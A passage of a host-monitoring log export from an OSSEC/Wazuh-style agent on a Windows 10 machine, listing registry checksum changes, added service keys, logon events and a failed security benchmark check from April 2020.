'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_2b7cd' was added. +" +"Apr 4, 2020 @ 15:20:43.232",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_2b7cd\Security' was added. +" +"Apr 4, 2020 @ 15:20:40.966",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2b7cd' was added. +" +"Apr 4, 2020 @ 15:20:40.937",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2b7cd\TriggerInfo\4' was added. +" +"Apr 4, 2020 @ 15:20:40.905",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2b7cd\TriggerInfo\3' was added. 
+" +"Apr 4, 2020 @ 15:20:40.888",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2b7cd\TriggerInfo\2' was added. +" +"Apr 4, 2020 @ 15:20:40.873",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2b7cd\TriggerInfo\1' was added. +" +"Apr 4, 2020 @ 15:20:40.858",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2b7cd\TriggerInfo\0' was added. +" +"Apr 4, 2020 @ 15:20:40.841",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2b7cd\Security' was added. +" +"Apr 4, 2020 @ 15:20:39.952",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_2b7cd' was added. +" +"Apr 4, 2020 @ 15:20:39.935",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_2b7cd\Security' was added. +" +"Apr 4, 2020 @ 15:20:39.669",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-90-0-2' checksum changed. +Old md5sum was: 'cc131ed9046fdc4473415eda7dfda2bd' +New md5sum is : '3c103fb65c38ddc72e97c82b21c94a74' +Old sha1sum was: '9384caab289e45a45d742e5aa407d878d3097b5a' +New sha1sum is : 'd5ea3065712606e0ca494a7501b14f02c2efff00' +" +"Apr 4, 2020 @ 15:20:39.656",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-90-0-1' checksum changed. 
+Old md5sum was: '34d7c82c5e420ab011490952e3ec24d9' +New md5sum is : 'c27dbca062ca06a70a39612561b7c82d' +Old sha1sum was: '88ab8d62bed217dca932dc4cb700cedfda2782c0' +New sha1sum is : 'd83d981337b440cae6327e24c113e9d8524a5fce' +" +"Apr 4, 2020 @ 15:20:39.638",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: 'f99554cc3af126a43609b522296e3789' +New md5sum is : '83f33b7a512d7bb9d2926bf38e588f68' +Old sha1sum was: '79e65a0a0aa4ac842cd2db7310b55b8ce48384cf' +New sha1sum is : '0b27022fba35b561c54e96e35d085c2fe2815c04' +" +"Apr 4, 2020 @ 15:20:39.622",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1000' checksum changed. +Old md5sum was: '3de12a32ccbd37717a2ea08417d7fddc' +New md5sum is : '21c20e9307ad43dbf66b7a80761f0ae8' +Old sha1sum was: 'b7451a316325cba8f20dce525a6e35a14bc91803' +New sha1sum is : '9f188f582f1b626cd2abfc5045f67af326f52d7b' +" +"Apr 4, 2020 @ 15:20:39.606",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-18' checksum changed. +Old md5sum was: '519c95147a332fa984f21fa352a3e6fd' +New md5sum is : '21f6133d49aa702ddb2203de2145bce7' +Old sha1sum was: '22be62c29307035d650978bc7ed1fcc26546a41e' +New sha1sum is : '1fe6493056f2b0c366fdb06a6d474200ee7f3874' +" +"Apr 4, 2020 @ 15:20:37.326",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_2b7cd' was added. +" +"Apr 4, 2020 @ 15:20:37.311",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_2b7cd\Security' was added. 
+" +"Apr 4, 2020 @ 15:20:22.856",5,"License Activation (slui.exe) failed", +"Apr 4, 2020 @ 15:20:17.936",3,"Windows Logon Success", +"Apr 4, 2020 @ 15:20:15.529",3,"Windows Logon Success", +"Apr 4, 2020 @ 15:20:15.475",3,"Windows Logon Success", +"Apr 4, 2020 @ 15:20:15.437",5,"System time changed", +"Apr 4, 2020 @ 15:20:15.423",5,"System time changed", +"Apr 4, 2020 @ 15:19:44.637",3,"Software Protection service scheduled successfully", +"Apr 4, 2020 @ 15:19:26.668",3,"Windows User Logoff", +"Apr 4, 2020 @ 15:19:26.644",3,"Windows User Logoff", +"Apr 4, 2020 @ 15:19:26.576",3,"Windows Workstation Logon Success", +"Apr 4, 2020 @ 15:19:26.558",3,"Windows Workstation Logon Success", +"Apr 4, 2020 @ 15:19:23.418",3,"Windows Logon Success", +"Apr 4, 2020 @ 15:19:14.409",5,"SCA summary: Benchmark for Windows audit: Score less than 80% (66)", +"Apr 4, 2020 @ 15:19:10.426",5,"License Activation (slui.exe) failed", +"Apr 4, 2020 @ 15:19:07.046",3,"Windows Logon Success", +"Apr 4, 2020 @ 15:19:06.952",3,"Windows Logon Success", +"Apr 4, 2020 @ 15:19:06.838",3,"The Windows Search Service started", +"Apr 4, 2020 @ 15:19:06.761",9,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from 'not applicable' to failed", +"Apr 4, 2020 @ 15:19:06.608",3,"The database engine attached a database", +"Apr 4, 2020 @ 15:19:06.527",3,"The database engine is starting a new instance", +"Apr 4, 2020 @ 15:19:04.263",5,"SessionEnv was unavailable to handle a notification event", +"Apr 4, 2020 @ 15:19:03.952",3,"Windows Workstation Logon Success", +"Apr 4, 2020 @ 15:19:03.942",3,"Windows Workstation Logon Success", +"Apr 4, 2020 @ 15:19:03.308",7,"SessionEnv was unavailable to handle a critical notification event", +"Apr 4, 2020 @ 15:19:01.094",3,"Windows Logon Success", +"Apr 4, 2020 @ 15:18:59.122",3,"Ossec agent started.","ossec: Agent started: 'windows-10->any'." 
+"Apr 4, 2020 @ 15:18:09.641",3,"Windows User Logoff", +"Apr 4, 2020 @ 15:18:09.601",5,"Windows System error event", +"Apr 4, 2020 @ 15:18:08.924",5,"SessionEnv was unavailable to handle a notification event", +"Apr 4, 2020 @ 15:18:08.908",5,"WSearch was unavailable to handle a notification event", +"Apr 4, 2020 @ 15:17:57.592",3,"Software Protection service scheduled successfully", +"Apr 4, 2020 @ 15:17:20.115",3,"Software Protection service scheduled successfully", +"Apr 4, 2020 @ 15:16:38.823",3,"Proof of Purchase installed successfully", +"Apr 4, 2020 @ 15:15:12.924",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. +Old md5sum was: 'd2afe6cd3b0d76b57e79a6a2e287c7ea' +New md5sum is : 'a42aba8bfc3fa20348a9721ae0ca3460' +Old sha1sum was: 'e025dd55baf1c0980b048620023acc71bdbf6c85' +New sha1sum is : 'e9eb87c9f46d8fb813cc6fdd1b8c16b59b46ad4f' +" +"Apr 4, 2020 @ 15:15:12.909",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '5c846d33afca4692d83a3ab365ad6442' +New md5sum is : 'b0509f8ae7589a36b0e922ea55370a2a' +Old sha1sum was: '084d92d987ccfb645a193f074fd7a6b45d5fd358' +New sha1sum is : '7c173f25809414b691ff85859d444a8615734f04' +" +"Apr 4, 2020 @ 15:15:11.277",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System' checksum changed. +Old md5sum was: 'c8ac4b841c008e3ac0a8a192544d37c5' +New md5sum is : '401e534489c4201969c73e3417a991dd' +Old sha1sum was: 'e0866d0f9ff0c9fa64a69a11948050e82fbb6b83' +New sha1sum is : 'e32cf50732d765aaecb1f3cf7b634619089e4aaa' +" +"Apr 4, 2020 @ 15:15:10.409",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System' checksum changed. 
+Old md5sum was: 'c8ac4b841c008e3ac0a8a192544d37c5' +New md5sum is : '401e534489c4201969c73e3417a991dd' +Old sha1sum was: 'e0866d0f9ff0c9fa64a69a11948050e82fbb6b83' +New sha1sum is : 'e32cf50732d765aaecb1f3cf7b634619089e4aaa' +" +"Apr 4, 2020 @ 15:15:08.863",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_30ad3' was added. +" +"Apr 4, 2020 @ 15:15:08.846",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_30ad3\Security' was added. +" +"Apr 4, 2020 @ 15:14:59.799",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\NtpClient' checksum changed. +Old md5sum was: 'b4226e31c64aa3415f26064e055e68c3' +New md5sum is : '0537eac2a8f888ccfe2ff7c9cb88eba4' +Old sha1sum was: '46945000f0220428ef57f13d54c8a2ceaa305687' +New sha1sum is : '011c9cae6591b6ed5bc8cf0ad3eebcd91c70322c' +" +"Apr 4, 2020 @ 15:14:59.737",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. +Old md5sum was: 'c3d642ddecf73503974d3d9b152c6526' +New md5sum is : 'df9be7629f6b4bb426436fddfdda3e00' +Old sha1sum was: '7ecbc5c7a471777187b03d69d68194b23951185f' +New sha1sum is : '27944b26d8cfd2e43728eb7197de1c8f824a233d' +" +"Apr 4, 2020 @ 15:14:59.721",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. +Old md5sum was: 'cd94995ffa04df33ca0e72974862aeae' +New md5sum is : 'eef4559e7fd1bceae06925bdc22dd84b' +Old sha1sum was: '60779cbd090ab8ef17ba7b628c70e7b97dcf07bf' +New sha1sum is : '5e9ea0459e03ac8fca6d6a6e915584a6d0419d0a' +" +"Apr 4, 2020 @ 15:14:59.018",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VSS\Diag\VolSnap' checksum changed. 
+Old md5sum was: '716f7304e80f8c3f1b5b2453fe30ef3e' +New md5sum is : '70803ff74c6137bb9c30faef6663c67e' +Old sha1sum was: 'c28f4f92f94fb258c0938828b2eed5ab28a74bbc' +New sha1sum is : '6fcc6a87284459c8396289b99fe1d19b455650f3' +" +"Apr 4, 2020 @ 15:14:57.612",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Vid\Parameters\Wdf' checksum changed. +Old md5sum was: 'b10575c071885e0e95058e3339a1667d' +New md5sum is : '1935e9f379e872308a49f6d8f4863bc5' +Old sha1sum was: '5c843b32b91998ce3cb955104fd52f7bf07e6d6d' +New sha1sum is : 'c9ae2d75231460ef4dab9ce1033d917d8630f141' +" +"Apr 4, 2020 @ 15:14:57.362",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\vdrvroot\Parameters\Wdf' checksum changed. +Old md5sum was: '1218d71e4c260ad33840e156ba1916d6' +New md5sum is : '96f3da64bf19dc1bd781394ccce1fbeb' +Old sha1sum was: '73ce2ff89a16e1dbd217e9158794b46d458cc3b7' +New sha1sum is : 'd27fb1d8e05747b9210064f64aa3c8d84f5e96a6' +" +"Apr 4, 2020 @ 15:14:56.752",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_30ad3' was added. +" +"Apr 4, 2020 @ 15:14:56.736",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_30ad3\Security' was added. +" +"Apr 4, 2020 @ 15:14:56.611",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\USBXHCI\Parameters\Wdf' checksum changed. +Old md5sum was: '0147defdd6e3cc2241869f6366d80d6e' +New md5sum is : '44e16df733261010319c89f3decf1694' +Old sha1sum was: '8338c694e073f86e5cd3b378ca03e78c4d475c62' +New sha1sum is : 'b18203806fe0dae10954bb7bb39c25b8b0d4e978' +" +"Apr 4, 2020 @ 15:14:56.424",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\USBHUB3\Parameters\Wdf' checksum changed. 
+Old md5sum was: 'ea3a5186b08026d706fec82e92df07c7' +New md5sum is : '4559d805700630cd4bcb2f3aec755c25' +Old sha1sum was: 'a4d376f4accdc1f57b6f2f9301859a9404868adf' +New sha1sum is : '058f1b6c28e41a92ba1b747585b9ac8a56baec34' +" +"Apr 4, 2020 @ 15:14:55.955",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_30ad3' was added. +" +"Apr 4, 2020 @ 15:14:55.940",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_30ad3\Security' was added. +" +"Apr 4, 2020 @ 15:14:55.252",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\umbus\Parameters\Wdf' checksum changed. +Old md5sum was: 'b10575c071885e0e95058e3339a1667d' +New md5sum is : '1935e9f379e872308a49f6d8f4863bc5' +Old sha1sum was: '5c843b32b91998ce3cb955104fd52f7bf07e6d6d' +New sha1sum is : 'c9ae2d75231460ef4dab9ce1033d917d8630f141' +" +"Apr 4, 2020 @ 15:14:53.314",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{10cb9356-9dd8-4d03-959f-611e879a11a6}' checksum changed. +Old md5sum was: 'ccebd772ef698e648fbc3c0804db213c' +New md5sum is : '4c3f002c2542e6c47bd1e5d5526ad531' +Old sha1sum was: '4aad002a9a35fbf136143ed1137e315f8d5f2eaf' +New sha1sum is : '00ea6b590c5fa5bcac5c671a151c31127ac60089' +" +"Apr 4, 2020 @ 15:14:49.846",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\srvnet\Parameters' checksum changed. +Old md5sum was: 'b7992042185fc6ec85e366e31893c993' +New md5sum is : '5d8658099109c05a39f0550c9fe2078d' +Old sha1sum was: '7da8cd2c012f8b55d1d5ce23f9ccdf45379c55ad' +New sha1sum is : 'bd60f0594b3758e2b86084c77d5b75b32d4df8b1' +" +"Apr 4, 2020 @ 15:14:48.126",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\AppIso\FirewallRules' checksum changed. 
+Old md5sum was: '52fb5d0b7da48f73ac3fbe434dfe1f0a' +New md5sum is : '4ec372e5c956917c47740315de22f258' +Old sha1sum was: 'de2f6be9dbec4b2bb8df4ca2490e582bcd21add6' +New sha1sum is : '1ebd67340dfc660448dc620eb68e7fb4cf9c565a' +" +"Apr 4, 2020 @ 15:14:47.501",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules' checksum changed. +Old md5sum was: 'b37d88849329a851787efa3b6513665f' +New md5sum is : 'e25d33057cf71b330830d5e95b124fe5' +Old sha1sum was: 'c9c09efe3bf177be5acc55723783810cf39fbd8a' +New sha1sum is : '624751317ab817d1c615abbd24c010d370e34268' +" +"Apr 4, 2020 @ 15:14:47.455",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch2' checksum changed. +Old md5sum was: 'dc9f9e3fba782230828c1350ebdd6327' +New md5sum is : '06e3a0893e8471fe1ad4937da2a83d5f' +Old sha1sum was: 'df82c4e7b328c25ab2a829fbb36079904d347a00' +New sha1sum is : '0b07d04f35b9382f85cdc6152e8d39398c1f055b' +" +"Apr 4, 2020 @ 15:14:47.439",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch' checksum changed. +Old md5sum was: '3e5e3c422cb01f5f45c7825a34e33ae9' +New md5sum is : '5fb1e28e9e1ea88c6ada6523c4164966' +Old sha1sum was: '9091ccb7071ec177f9a4162ad1aa86bdecdd70c3' +New sha1sum is : 'd1f49ffeb1bbc4493fe5bce52eaf75cccf81560c' +" +"Apr 4, 2020 @ 15:14:43.126",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\rdyboost\Diagnostics' checksum changed. +Old md5sum was: 'fa742e572a0ab3ad838cdc36f548a2e7' +New md5sum is : 'a790734f197ecec9285de0c7c3ee54a1' +Old sha1sum was: '4bd92b98f3142283ddbfa0b8875cc0e446f8a651' +New sha1sum is : '2a056b4354493d8181a6997a08b72094f1778f22' +" +"Apr 4, 2020 @ 15:14:40.965",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_30ad3' was added. 
+" +"Apr 4, 2020 @ 15:14:40.964",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_30ad3\Security' was added. +" +"Apr 4, 2020 @ 15:14:38.517",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_30ad3' was added. +" +"Apr 4, 2020 @ 15:14:38.501",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_30ad3\Security' was added. +" +"Apr 4, 2020 @ 15:14:36.626",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_30ad3' was added. +" +"Apr 4, 2020 @ 15:14:36.610",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_30ad3\Security' was added. +" +"Apr 4, 2020 @ 15:14:33.876",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NdisVirtualBus\Parameters\Wdf' checksum changed. +Old md5sum was: '4b892ced83fc54554ffca5ac0787d33d' +New md5sum is : '3afaf17706b569cfc181c32e11e3e1e3' +Old sha1sum was: 'fec8c41e2f6734e8e932e3ca7cd14aa68a2d12a9' +New sha1sum is : '4d4da11dce9a318cf536df3a5f5d41a6c41f70dd' +" +"Apr 4, 2020 @ 15:14:32.580",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\mssmbios\Data' checksum changed. +Old md5sum was: '56e9f0a7add3da7f007b812f71fed075' +New md5sum is : '1e6e38e0129cb1178036ce2d2de63896' +Old sha1sum was: 'e34bbe63c9ca7e70f4e38fca2b5911ca2863966f' +New sha1sum is : 'c69f3fa6abcfb59085cdd1e6fe3925b88bf1eb8a' +" +"Apr 4, 2020 @ 15:14:32.329",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\msisadrv\Parameters\Wdf' checksum changed. 
+Old md5sum was: '1d734d0614a7f9396fa5bea37be23603' +New md5sum is : '582b366b698c74fe5d3e40a47e1b8010' +Old sha1sum was: 'c5d286f501575f57fe00f3d3f030a51179901720' +New sha1sum is : '8961c68f641a2a7819a49e53b3c6e5e24bcee551' +" +"Apr 4, 2020 @ 15:14:31.376",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\monitor\Parameters\Wdf' checksum changed. +Old md5sum was: '2b11f9b94557bbaa06c68efc5f79ceb1' +New md5sum is : '1f292403ac7b268e3b11f111ded67e2c' +Old sha1sum was: 'f5d52d3a7f4d9b26ce2cb09d87c3a9d9f48455ed' +New sha1sum is : 'c336ebf7d883f128c8920b416859ef494e2e018c' +" +"Apr 4, 2020 @ 15:14:31.253",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_30ad3' was added. +" +"Apr 4, 2020 @ 15:14:31.235",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_30ad3\TriggerInfo\0' was added. +" +"Apr 4, 2020 @ 15:14:31.220",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_30ad3\Security' was added. +" +"Apr 4, 2020 @ 15:14:27.329",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanServer\Parameters' checksum changed. +Old md5sum was: 'ec73eedc0675f39acf932c36452ef49a' +New md5sum is : '1e18b407d6fa2ba2ca94f603ba4f26b4' +Old sha1sum was: '6573df49eab79fe379b169a6836058b37e7978c7' +New sha1sum is : '0df5dd168081c6678164f4e60dce87117ddfa87e' +" +"Apr 4, 2020 @ 15:14:25.907",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\intelppm\Parameters\Wdf' checksum changed. 
+Old md5sum was: '4b892ced83fc54554ffca5ac0787d33d' +New md5sum is : '3afaf17706b569cfc181c32e11e3e1e3' +Old sha1sum was: 'fec8c41e2f6734e8e932e3ca7cd14aa68a2d12a9' +New sha1sum is : '4d4da11dce9a318cf536df3a5f5d41a6c41f70dd' +" +"Apr 4, 2020 @ 15:14:23.281",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\HDAudBus\Parameters\Wdf' checksum changed. +Old md5sum was: 'cf1c968e34c5937dfe0a68b65d9ceb55' +New md5sum is : 'da7d5ec8cdd7285f49105e5efe9c6bb8' +Old sha1sum was: '175f379d4d248570ffb2597259322ff1e0af9716' +New sha1sum is : 'eb0efa8d18c93a3996afdf9ff649e81a5d40b033' +" +"Apr 4, 2020 @ 15:14:22.564",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\gencounter\Parameters\Wdf' checksum changed. +Old md5sum was: '4b892ced83fc54554ffca5ac0787d33d' +New md5sum is : '3afaf17706b569cfc181c32e11e3e1e3' +Old sha1sum was: 'fec8c41e2f6734e8e932e3ca7cd14aa68a2d12a9' +New sha1sum is : '4d4da11dce9a318cf536df3a5f5d41a6c41f70dd' +" +"Apr 4, 2020 @ 15:14:21.437",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\FDResPub\ServiceData' checksum changed. +Old md5sum was: 'ae9643074ec7a4ef81bb63a482e527c9' +New md5sum is : '180219dd3d5cd4e9bd4f437e6b975dc1' +Old sha1sum was: 'bb90e1460f2a74046f7b573529a69b9faa6b3a52' +New sha1sum is : 'c8b4a3f4d649c55502e3e419db9da373945302cb' +" +"Apr 4, 2020 @ 15:14:11.469",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\EventLog\State' checksum changed. 
+Old md5sum was: 'bc26ea2b86aac0a94081e153d9d0ff1b' +New md5sum is : 'c5c6ddae9a35331147842cd5448debe5' +Old sha1sum was: 'f68b300b77ea5ebb731ef5b341d03cb634f764b8' +New sha1sum is : 'cba0805b3a87df3e8916c67705d47828f0618ed0' +" +"Apr 4, 2020 @ 15:14:05.016",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Dnscache\Parameters\Probe\{a957488a-bcc3-4136-8332-2c86058caa77}' checksum changed. +Old md5sum was: '53e3e466da95a82ede12fa122585fa45' +New md5sum is : '385c9184ac544829488be8ce5b5671ff' +Old sha1sum was: '06a8de5ad522c838b0960f7fae2ec320337f41a4' +New sha1sum is : 'fa617e764e334ea237bea1af00d403f462f50d6f' +" +"Apr 4, 2020 @ 15:14:03.710",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_30ad3' was added. +" +"Apr 4, 2020 @ 15:14:03.676",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_30ad3\Security' was added. +" +"Apr 4, 2020 @ 15:14:03.610",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_30ad3' was added. +" +"Apr 4, 2020 @ 15:14:03.593",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_30ad3\Security' was added. +" +"Apr 4, 2020 @ 15:14:03.328",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_30ad3' was added. +" +"Apr 4, 2020 @ 15:14:03.313",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_30ad3\Security' was added. +" +"Apr 4, 2020 @ 15:14:02.688",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_30ad3' was added. 
+" +"Apr 4, 2020 @ 15:14:02.672",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_30ad3\Security' was added. +" +"Apr 4, 2020 @ 15:14:02.547",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_30ad3' was added. +" +"Apr 4, 2020 @ 15:14:02.531",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_30ad3\Security' was added. +" +"Apr 4, 2020 @ 15:14:02.359",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CompositeBus\Parameters\Wdf' checksum changed. +Old md5sum was: 'b10575c071885e0e95058e3339a1667d' +New md5sum is : '1935e9f379e872308a49f6d8f4863bc5' +Old sha1sum was: '5c843b32b91998ce3cb955104fd52f7bf07e6d6d' +New sha1sum is : 'c9ae2d75231460ef4dab9ce1033d917d8630f141' +" +"Apr 4, 2020 @ 15:14:01.078",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_30ad3' was added. +" +"Apr 4, 2020 @ 15:14:01.063",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_30ad3\Security' was added. +" +"Apr 4, 2020 @ 15:14:00.906",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_30ad3' was added. +" +"Apr 4, 2020 @ 15:14:00.893",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_30ad3\Security' was added. +" +"Apr 4, 2020 @ 15:14:00.813",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_30ad3' was added. +" +"Apr 4, 2020 @ 15:14:00.796",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_30ad3\Security' was added. 
+" +"Apr 4, 2020 @ 15:13:58.609",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_30ad3' was added. +" +"Apr 4, 2020 @ 15:13:58.594",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_30ad3\TriggerInfo\4' was added. +" +"Apr 4, 2020 @ 15:13:58.563",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_30ad3\TriggerInfo\3' was added. +" +"Apr 4, 2020 @ 15:13:58.546",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_30ad3\TriggerInfo\2' was added. +" +"Apr 4, 2020 @ 15:13:58.531",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_30ad3\TriggerInfo\1' was added. +" +"Apr 4, 2020 @ 15:13:58.515",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_30ad3\TriggerInfo\0' was added. +" +"Apr 4, 2020 @ 15:13:58.500",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_30ad3\Security' was added. +" +"Apr 4, 2020 @ 15:13:57.640",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_30ad3' was added. +" +"Apr 4, 2020 @ 15:13:57.625",5,"File added to the system.","File 